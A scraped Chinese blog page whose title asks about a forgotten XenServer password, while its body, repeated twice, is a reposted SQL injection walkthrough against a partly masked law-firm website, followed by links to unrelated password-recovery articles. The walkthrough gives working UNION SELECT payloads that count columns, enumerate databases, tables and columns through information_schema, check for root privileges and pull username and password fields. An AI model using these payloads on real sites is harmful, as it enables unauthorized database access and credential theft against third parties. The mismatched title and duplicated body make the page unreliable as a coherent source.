xenserver忘记密码怎么办?
2014-09-30 09:55
162 查看
注:为了网站的安全,对网址做了处理
渗透目标:http://www.lawxxxxxxx.com.cn
[align=left] [/align]
[align=left]注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377[/align]
[align=left] [/align]
[align=left]http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那么就是14[/align]
[align=left] [/align]
[align=left]http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14[/align]
[align=left]------------------------------------------------[/align]
[align=left]页面出现的数字是8和12[/align]
[align=left]------------------------------------------------[/align]
[align=left]用以下的函数来得到我们想要的[/align]
user() 得到连接数据库的用户名 lawyerxxxx@manaxxx.xxxx.com
database() 得到数据库名 lawyerxxxxxx
version() 得到版本 5.1.53-log
[align=left] [/align]
[align=left]用函数来替换12,得到相关的信息[/align]
[align=left]-----------------------------------------------[/align]
[align=left]判断权限[/align]
[align=left]ord(mid(user(),1,1))=114/* 返回错误就不是root权限[/align]
[align=left]--------------------------------------[/align]
[align=left]列出数据库表 需要转编码[/align]
[align=left]unhex(hex(group_concat(schema_name)))[/align]
[align=left] (table_name)))[/align]
[align=left] (column_name)))[/align]
[align=left]例如:[/align]
http://www.lawyexxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
[align=left]unhex(hex(group_concat(schema_name)))[/align]
,13,14 from information_schema.schemata 列出数据库 information_schema,lawyerxxxxxx
[align=left]------------------------------------------[/align]
[align=left]下面的需要转码的 转为hex编码 (用工具转)[/align]
[align=left]-----------------------------------------------------------------------------------[/align]
[align=left]追加列表[/align]
[align=left] from information_schema.schemata 列数据库[/align]
[align=left] from information_schema.tables where table_shema= 列用户[/align]
[align=left] from information_schema.columns where table_name= 列表[/align]
[align=left]例如:[/align]
[align=left]http://www.lawyexxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,[/align]
[align=left]unhex(hex(group_concat(table_name)))[/align]
[align=left],13,14 from information_schema.tables where table_shema=0x6C6177796572666xxxxxx(lawyerxxxx20xx)(数据库名)[/align]
[align=left] [/align]
[align=left] http://www.lawyerxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,[/align]
[align=left]unhex(hex(group_concat(column_name)))[/align]
[align=left],13,14 from information_schema.columns where table_name=(表名)[/align]
[align=left]-------------------------------------------[/align]
[align=left]上面的需要转码的转为hex编码[/align]
[align=left]--------------------------------------------------------------------------------[/align]
[align=left] 获取用户名:[/align]
[align=left] [/align]
[align=left]http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,用户字段名,9,10,11,[/align]
[align=left]密码字段名,13,14 from 表名[/align]
本文出自 “冰点's博客” 博客,请务必保留此出处http://0x80sec.blog.51cto.com/3688825/966106
渗透目标:http://www.lawxxxxxxx.com.cn
[align=left] [/align]
[align=left]注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377[/align]
[align=left] [/align]
[align=left]http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那么就是14[/align]
[align=left] [/align]
[align=left]http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14[/align]
[align=left]------------------------------------------------[/align]
[align=left]页面出现的数字是8和12[/align]
[align=left]------------------------------------------------[/align]
[align=left]用以下的函数来得到我们想要的[/align]
user() 得到连接数据库的用户名 lawyerxxxx@manaxxx.xxxx.com
database() 得到数据库名 lawyerxxxxxx
version() 得到版本 5.1.53-log
[align=left] [/align]
[align=left]用函数来替换12,得到相关的信息[/align]
[align=left]-----------------------------------------------[/align]
[align=left]判断权限[/align]
[align=left]ord(mid(user(),1,1))=114/* 返回错误就不是root权限[/align]
[align=left]--------------------------------------[/align]
[align=left]列出数据库表 需要转编码[/align]
[align=left]unhex(hex(group_concat(schema_name)))[/align]
[align=left] (table_name)))[/align]
[align=left] (column_name)))[/align]
[align=left]例如:[/align]
http://www.lawyexxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
[align=left]unhex(hex(group_concat(schema_name)))[/align]
,13,14 from information_schema.schemata 列出数据库 information_schema,lawyerxxxxxx
[align=left]------------------------------------------[/align]
[align=left]下面的需要转码的 转为hex编码 (用工具转)[/align]
[align=left]-----------------------------------------------------------------------------------[/align]
[align=left]追加列表[/align]
[align=left] from information_schema.schemata 列数据库[/align]
[align=left] from information_schema.tables where table_shema= 列用户[/align]
[align=left] from information_schema.columns where table_name= 列表[/align]
[align=left]例如:[/align]
[align=left]http://www.lawyexxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,[/align]
[align=left]unhex(hex(group_concat(table_name)))[/align]
[align=left],13,14 from information_schema.tables where table_shema=0x6C6177796572666xxxxxx(lawyerxxxx20xx)(数据库名)[/align]
[align=left] [/align]
[align=left] http://www.lawyerxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,[/align]
[align=left]unhex(hex(group_concat(column_name)))[/align]
[align=left],13,14 from information_schema.columns where table_name=(表名)[/align]
[align=left]-------------------------------------------[/align]
[align=left]上面的需要转码的转为hex编码[/align]
[align=left]--------------------------------------------------------------------------------[/align]
[align=left] 获取用户名:[/align]
[align=left] [/align]
[align=left]http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,用户字段名,9,10,11,[/align]
[align=left]密码字段名,13,14 from 表名[/align]
本文出自 “冰点's博客” 博客,请务必保留此出处http://0x80sec.blog.51cto.com/3688825/966106
相关文章推荐
- ubuntu忘记了用户登录密码怎么办
- Oracle 11g 忘记sys用户密码和system用户密码,怎么办?
- mysql忘记密码怎么办
- Ubuntu 下面忘记root密码之后怎么修改
- 忘记手机的锁屏密码怎么办?
- BIEE 11g忘记rpd密码怎么办
- oracle忘记登录密码,该怎么办?
- Linux 下忘记root密码怎么办
- oracle忘记sys/system/scott用户的密码怎么办
- ubuntu忘记密码怎么办
- Android Keystore忘记密码怎么办?
- Linux下MySQL5.6.15-忘记root密码或者在mininal上装5.6之后,怎么初始化mysql
- MySQL密码忘记,怎么办?
- bugzilla忘记管理员密码怎么办?
- Linux系统下忘记MySql密码怎么办?
- 忘记Windows登陆密码怎么办?教你一个简单的破解方法
- 忘记了Jenkins管理员密码怎么办?
- vmware虚拟机Linux(centOS)上用户密码忘记了怎么办?
- oracle忘记sys/system/scott用户的密码怎么办
- 虚拟机装的LINUX忘记了密码怎么办?